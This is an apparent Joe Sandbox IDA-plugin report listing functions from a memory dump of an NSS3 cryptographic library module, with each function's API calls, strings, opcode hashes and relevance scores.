Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID:
API String ID: 3136566230-0
Opcode ID: 6de5e526c59e84cd95f9c2a46a523616c7c9e96238c67572fd7c1bdf21c7e9eb
Instruction ID: abbac47f046279a87c77a5ac322c7976b3e758c5e4d1704136df62eb84f5dd52
Opcode Fuzzy Hash: 6de5e526c59e84cd95f9c2a46a523616c7c9e96238c67572fd7c1bdf21c7e9eb
Instruction Fuzzy Hash: EB41C5B1900299ABEB009F64ED45BEF7A74EF0530CF140128ED1557B41E735EA68CBE2

Function 6CAA4FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6CBF0148,?,6CAB6FEC), ref: 6CAA502A
PR_NewLock.NSS3(00000001,00000000,6CBF0148,?,6CAB6FEC), ref: 6CAA5034
PL_NewHashTable.NSS3(00000000,6CAFFE80,6CAFFD30,6CB4C350,00000000,00000000,00000001,00000000,6CBF0148,?,6CAB6FEC), ref: 6CAA5055
PL_NewHashTable.NSS3(00000000,6CAFFE80,6CAFFD30,6CB4C350,00000000,00000000,?,00000001,00000000,6CBF0148,?,6CAB6FEC), ref: 6CAA506D

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: 0a4da2eb3e5ec4f2401c7264797210ca9c92c91c67ce3d28c1f827f96a19f715
Instruction ID: d852bfca7429db9210cc4e8cea5e9c1f06999703cf06f05dcbc8d19de76299f6
Opcode Fuzzy Hash: 0a4da2eb3e5ec4f2401c7264797210ca9c92c91c67ce3d28c1f827f96a19f715
Instruction Fuzzy Hash: C1311AB1B016105BEB109BA6C89C75777B8971770CF06411DEA14C3B41D3B6CC89DBE4

Function 6CA42E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA42F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6CA42FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6CA43005
memcpy.VCRUNTIME140(?,?,?), ref: 6CA430EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA43131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA43178

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA43022, 6CA43156, 6CA43162, 6CA4318A, 6CA43196, 6CA431A2, 6CA431AE, 6CA431BA, 6CA431C6
%s at line %d of [%.10s], xrefs: 6CA43171
database corruption, xrefs: 6CA4316C

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: c347b5c012d87a3547c83e512446f66dba56aad0387003201ab6daeaeb21461a
Instruction ID: 1cde1f2d14a0a4731accfc27bc608dc159e6f0f9c20934c7be121fbae42ac481
Opcode Fuzzy Hash: c347b5c012d87a3547c83e512446f66dba56aad0387003201ab6daeaeb21461a
Instruction Fuzzy Hash: 89B17D70E06215DBDF18CF9DC885AEEB7B1BF48304F288169E845B7B41D7759981CBA0

Function 6CB17F90 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6CB17FB2

Part of subcall function 6CA9BA40: TlsGetValue.KERNEL32 ref: 6CA9BA51
Part of subcall function 6CA9BA40: TlsGetValue.KERNEL32 ref: 6CA9BA6B
Part of subcall function 6CA9BA40: EnterCriticalSection.KERNEL32 ref: 6CA9BA83
Part of subcall function 6CA9BA40: TlsGetValue.KERNEL32 ref: 6CA9BAA1
Part of subcall function 6CA9BA40: _PR_MD_UNLOCK.NSS3 ref: 6CA9BAC0

PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6CB17FD4

Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690AB
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690C9
Part of subcall function 6CB69090: EnterCriticalSection.KERNEL32 ref: 6CB690E5
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB69116
Part of subcall function 6CB69090: LeaveCriticalSection.KERNEL32 ref: 6CB6913F

Part of subcall function 6CB19430: PR_SetError.NSS3(FFFFD0AC,00000000), ref: 6CB19466

PR_ExitMonitor.NSS3(?), ref: 6CB1801B
PR_EnterMonitor.NSS3(?), ref: 6CB18034
TlsGetValue.KERNEL32 ref: 6CB180A2
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB180C0
PR_ExitMonitor.NSS3(?), ref: 6CB1811C
PR_ExitMonitor.NSS3(?), ref: 6CB18134

Strings

), xrefs: 6CB180DB

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSection$Error$CountEntryLeave
String ID: )
API String ID: 3537756449-2427484129
Opcode ID: 7cc95cf7c8363e7c7ad3a29c64c1d6af471b8505e0fd816dbbcd1440dbea14d9
Instruction ID: 0cd8a88832acf82eb9911cadd0559215339ed415dec706f8c74aff87766afd06
Opcode Fuzzy Hash: 7cc95cf7c8363e7c7ad3a29c64c1d6af471b8505e0fd816dbbcd1440dbea14d9
Instruction Fuzzy Hash: 43514372A087888BEB218B35DC057AB77B4FF5631CF09052ADD5993E41E732A618C682

Function 6CABFCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6CABFCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6CABFCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6CABFCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CABFD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CABFD46
PORT_Alloc_Util.NSS3(00000001), ref: 6CABFD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6CABFD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CABFD84

Strings

:, xrefs: 6CABFD78

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: 8177d30c13a45db4c055cd313905867a930f06b0904c2cdca5161def04d8cdb9
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: 2931CDBE9002459BEB008AA9DC057AF77ACAB5131CF1D0529DC14B7B10E772EA98C7D2

Function 6CAD6C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6CAD6C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAD6C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD6CA3

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CAD6CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CAD6CD5

Strings

pMechanism = 0x%p, xrefs: 6CAD6CD0
C_DigestInit, xrefs: 6CAD6C61
hSession = 0x%x, xrefs: 6CAD6C7E, 6CAD6C8E
(CK_INVALID_HANDLE), xrefs: 6CAD6C9C

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: 03a567b2443946a20e4143495dd8d513cc02d0cce3a80811457a9f76e1be912f
Instruction ID: 9b1e3548ff20fef7d42c7614ecf2e1e378efe319a4e81afea2807c61f1339097
Opcode Fuzzy Hash: 03a567b2443946a20e4143495dd8d513cc02d0cce3a80811457a9f76e1be912f
Instruction Fuzzy Hash: 8121F5757001949BDB009F64EE49BAE37B5EB4221DF4B4429E409E7B02DF35A98CCB92

Function 6CAD9DD0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SessionCancel), ref: 6CAD9DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAD9E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD9E33

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CAD9E49
PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6CAD9E65

Strings

flags = 0x%x, xrefs: 6CAD9E60
C_SessionCancel, xrefs: 6CAD9DF1
hSession = 0x%x, xrefs: 6CAD9E0E, 6CAD9E1E
(CK_INVALID_HANDLE), xrefs: 6CAD9E2C

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
API String ID: 1003633598-1678415578
Opcode ID: e2bdae9bfb67be9d9b65303d2076a131e971201ee3f6515b2b45861aa78666da
Instruction ID: 39ccd94aa0c83ba0748cd074e644ac48d53adf6b76c6f8df020b143de7783dc1
Opcode Fuzzy Hash: e2bdae9bfb67be9d9b65303d2076a131e971201ee3f6515b2b45861aa78666da
Instruction Fuzzy Hash: 0821E6757012899FE7009B24DE98BAE37B5EB4271DF074028E509A7601DF35EC88C692

Function 6CAA0F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CAA0F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CAA0F84

Part of subcall function 6CAFB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBD18D0,?), ref: 6CAFB095

SEC_QuickDERDecodeItem_Util.NSS3(?,6CABF59B,6CBC890C,?), ref: 6CAA0FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6CAA0FC1

Part of subcall function 6CB00BE0: malloc.MOZGLUE(6CAF8D2D,?,00000000,?), ref: 6CB00BF8
Part of subcall function 6CB00BE0: TlsGetValue.KERNEL32(6CAF8D2D,?,00000000,?), ref: 6CB00C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6CAA0FDB
PR_CallOnce.NSS3(6CC02AA4,6CB012D0), ref: 6CAA0FEF
PL_FreeArenaPool.NSS3(?), ref: 6CAA1001
PL_FinishArenaPool.NSS3(?), ref: 6CAA1009

Strings

security, xrefs: 6CAA0F5C

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: 8966c08c1d698ac2240a0b4fa1c749f7ac2204e3579151f685ec905870caa9ff
Instruction ID: 4237988c1150e35b104492d797ec69ffe86829cd9dd9b3f430434722f4c9862a
Opcode Fuzzy Hash: 8966c08c1d698ac2240a0b4fa1c749f7ac2204e3579151f685ec905870caa9ff
Instruction Fuzzy Hash: 9E21F871A04284ABE7009F29DC41AAF7BB4EF4465CF048519FC5897701FB31D59ACBD2

Function 6CAA6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6CAA7D8F,6CAA7D8F,?,?), ref: 6CAA6DC8

Part of subcall function 6CAFFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CAFFE08
Part of subcall function 6CAFFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CAFFE1D
Part of subcall function 6CAFFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CAFFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CAA7D8F,?,?), ref: 6CAA6DD5

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBC8FA0,00000000,?,?,?,?,6CAA7D8F,?,?), ref: 6CAA6DF7

Part of subcall function 6CAFB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBD18D0,?), ref: 6CAFB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CAA6E35

Part of subcall function 6CAFFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CAFFE29
Part of subcall function 6CAFFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CAFFE3D
Part of subcall function 6CAFFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CAFFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CAA6E4C

Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBC8FE0,00000000), ref: 6CAA6E82

Part of subcall function 6CAA6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CAAB21D,00000000,00000000,6CAAB219,?,6CAA6BFB,00000000,?,00000000,00000000,?,?,?,6CAAB21D), ref: 6CAA6B01
Part of subcall function 6CAA6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CAA6B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CAA6F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CAA6F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBC8FE0,00000000), ref: 6CAA6F6B
PR_SetError.NSS3(FFFFE005,00000000,6CAA7D8F,?,?), ref: 6CAA6FE1

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 83917d606aeb8e8378968cc17d66a82e95d20ce6e2884aec16ae90312ab2cc9c
Instruction ID: c51073ff0f685266042f188637c9c447fe070c341317f1a1150407ec53ee443b
Opcode Fuzzy Hash: 83917d606aeb8e8378968cc17d66a82e95d20ce6e2884aec16ae90312ab2cc9c
Instruction Fuzzy Hash: E2716F71E106469BDB00CF59CD40BAABBB4BF58348F194229E818D7B11F771EAD6CB90

Function 6CAE0FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAE1057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAE1085
PK11_GetAllTokens.NSS3 ref: 6CAE10B1
free.MOZGLUE(?), ref: 6CAE1107
PR_SetError.NSS3(00000000,00000000), ref: 6CAE1172
free.MOZGLUE(?), ref: 6CAE1182
free.MOZGLUE(?), ref: 6CAE11A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6CAE11C5

Part of subcall function 6CAE52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6CABEAC5,00000001), ref: 6CAE52DF
Part of subcall function 6CAE52C0: EnterCriticalSection.KERNEL32(?), ref: 6CAE52F3
Part of subcall function 6CAE52C0: PR_Unlock.NSS3(?), ref: 6CAE5358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CAE11D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CAE11F3

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: 7fd9e9207c81cd8b94eeb660408c9615b8cca5274dd8f827c2f50d4c651cc665
Instruction ID: 1d8cbbe0006682ec5497e594db51bd293146f25819eae806b72e12f6a3d4439f
Opcode Fuzzy Hash: 7fd9e9207c81cd8b94eeb660408c9615b8cca5274dd8f827c2f50d4c651cc665
Instruction Fuzzy Hash: E06185B0E003559BDB00DF64DC81BAEB7B5BF09348F184128EE19AB742E731E995DB91

Function 6CAEADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6CACCDBB,?,6CACD079,00000000,00000001), ref: 6CAEAE10
EnterCriticalSection.KERNEL32(?,?,6CACCDBB,?,6CACD079,00000000,00000001), ref: 6CAEAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6CACD079,00000000,00000001), ref: 6CAEAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CACCDBB,?,6CACD079,00000000,00000001), ref: 6CAEAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6CACCDBB,?,6CACD079,00000000,00000001), ref: 6CAEAE7F
TlsGetValue.KERNEL32(?,6CACCDBB,?,6CACD079,00000000,00000001), ref: 6CAEAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CACCDBB,?,6CACD079,00000000,00000001), ref: 6CAEAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CACCDBB,?,6CACD079,00000000,00000001), ref: 6CAEAEF1
free.MOZGLUE(6CACCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CACCDBB,?), ref: 6CAEAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CACCDBB,?,6CACD079,00000000,00000001), ref: 6CAEAF30

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 0fa6176120f33b4d10acdf1b61843bd9c0e8de639f56bc901545b6a63be3a859
Instruction ID: ae025157e93ccfff0b1e4f55b0d9a9d6239785f481d4a05fa38a66507e8ce70b
Opcode Fuzzy Hash: 0fa6176120f33b4d10acdf1b61843bd9c0e8de639f56bc901545b6a63be3a859
Instruction Fuzzy Hash: E2518EB5A00611AFDB00DF29D884B5ABBB5FF08318F184664E81897F11E731ECA8DBD1

Function 6CAC4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6CACAB7F,?,00000000,?), ref: 6CAC4CB4
EnterCriticalSection.KERNEL32(0000001C,?,6CACAB7F,?,00000000,?), ref: 6CAC4CC8
TlsGetValue.KERNEL32(?,6CACAB7F,?,00000000,?), ref: 6CAC4CE0
EnterCriticalSection.KERNEL32(?,?,6CACAB7F,?,00000000,?), ref: 6CAC4CF4
PL_HashTableLookup.NSS3(?,?,?,6CACAB7F,?,00000000,?), ref: 6CAC4D03
PR_Unlock.NSS3(?,00000000,?), ref: 6CAC4D10

Part of subcall function 6CB4DD70: TlsGetValue.KERNEL32 ref: 6CB4DD8C
Part of subcall function 6CB4DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB4DDB4

PR_Now.NSS3(?,00000000,?), ref: 6CAC4D26

Part of subcall function 6CB69DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBB0A27), ref: 6CB69DC6
Part of subcall function 6CB69DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBB0A27), ref: 6CB69DD1
Part of subcall function 6CB69DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB69DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6CAC4D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CAC4DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CAC4E02

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

